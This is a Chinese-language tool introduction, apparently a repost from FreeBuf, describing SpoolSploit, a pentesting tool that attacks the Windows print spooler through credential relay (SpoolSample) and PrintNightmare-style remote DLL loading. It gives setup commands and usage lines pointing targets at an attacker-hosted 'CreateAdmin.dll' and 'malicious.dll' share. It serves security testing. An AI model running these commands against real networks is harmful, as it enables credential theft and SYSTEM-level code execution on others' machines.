如何使用SpoolSploit审查Windows打印后台处理程序的安全性

安全 网站安全
研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。

[[439991]]

关于SpoolSploit

SpoolSploit是一款针对Windows打印后台处理程序(print spooler)的安全审计工具,广大研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。

SpoolSploit中还封装了很多其他的实用工具,以便进行实际的漏洞利用和渗透测试。并实现了两种方法来中继计算机帐户凭据,以升级权限并在具有完全系统访问权限的节点上执行恶意DLL。

快速开始

自该项目发布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功测试。

我们建议广大用户在SpoolSploit Docker容器内执行渗透测试或凭据中继测试,并托管相应的DLL文件,然后确保运行Docker容器的主机上开启并未使用的445端口。在Windows主机上运行此容器时,这种情况最为普遍,因为默认情况下它使用的是端口445。如果你的主机上端口445已被占用或无法使用的话,可以在网桥模式下配置了网络适配器的虚拟机中运行Docker容器即可。

(1) 工具下载&访问SpoolSploit容器

首先,使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/BeetleChunks/SpoolSploit 

接下来,构建SpoolSploit Docker容器镜像:

  1. cd SpoolSploit 
  2.  
  3. sudo docker build -t spoolsploit . 

创建并启动SpoolSploit Docker容器:

  1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest 

绑定容器:

  1. sudo docker exec -it spoolsploit /bin/bash 

(2) 命令行使用

  1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD 
  2.  
  3. optional arguments: 
  4.  
  5.   -h, --help               显示帮助信息并退出 
  6.  
  7.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} 
  8.  
  9.                         需要在目标主机上执行的测试类型 
  10.  
  11.   -rH RHOST, --rhost RHOST 
  12.  
  13.                         远程目标IP、CIDR范围或文件名 (file:<path>
  14.  
  15.   -rP {139,445}, --rport {139,445} 
  16.  
  17.                         远程SMB服务器端口 
  18.  
  19.   -lH LHOST, --lhost LHOST 
  20.  
  21.                         监听主机名或IP地址 
  22.  
  23.   -lS LSHARE, --lshare LSHARE 
  24.  
  25.                         SMB共享 (UNC) 
  26.  
  27.   -d DOMAIN, --domain DOMAIN 
  28.  
  29.                         身份认证域名 
  30.  
  31.   -u USER, --username USER 
  32.  
  33.                         身份认证用户名 
  34.  
  35.   -p PASSWD, --password PASSWD 
  36.  
  37.                         身份认证密码 

工机使用样例

使用样例1:

  1. python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

使用样例2:

  1. python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

SpoolSample - Windows设备账号凭证获取和中继

  1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ 
  2.  
  3. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' 

工具使用截图

项目地址

SpoolSploit:【GitHub传送门

 

 

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2014-03-11 14:41:23

2009-11-30 09:41:38

2022-06-22 09:00:00

安全编程语言工具

2020-07-01 07:49:44

防火墙网络安全网络攻击

2011-02-13 14:36:35

2013-02-18 16:12:55

2019-10-24 10:40:51

Windows 10安全性密码登录

2016-06-12 11:53:27

2020-06-15 10:18:42

SaaS审查提供商

2009-11-06 09:59:55

2016-06-03 10:21:05

2021-10-19 06:05:20

网站安全网络威胁网络攻击

2015-07-17 13:16:06

2010-04-20 10:10:13

2023-09-26 08:21:30

2009-12-15 08:49:35

2009-10-21 13:15:20

2009-04-23 09:00:41

Windows 7微软操作系统

2012-07-30 10:07:01

2020-10-08 10:15:15

LynisLinux系统安全
点赞
收藏

51CTO技术栈公众号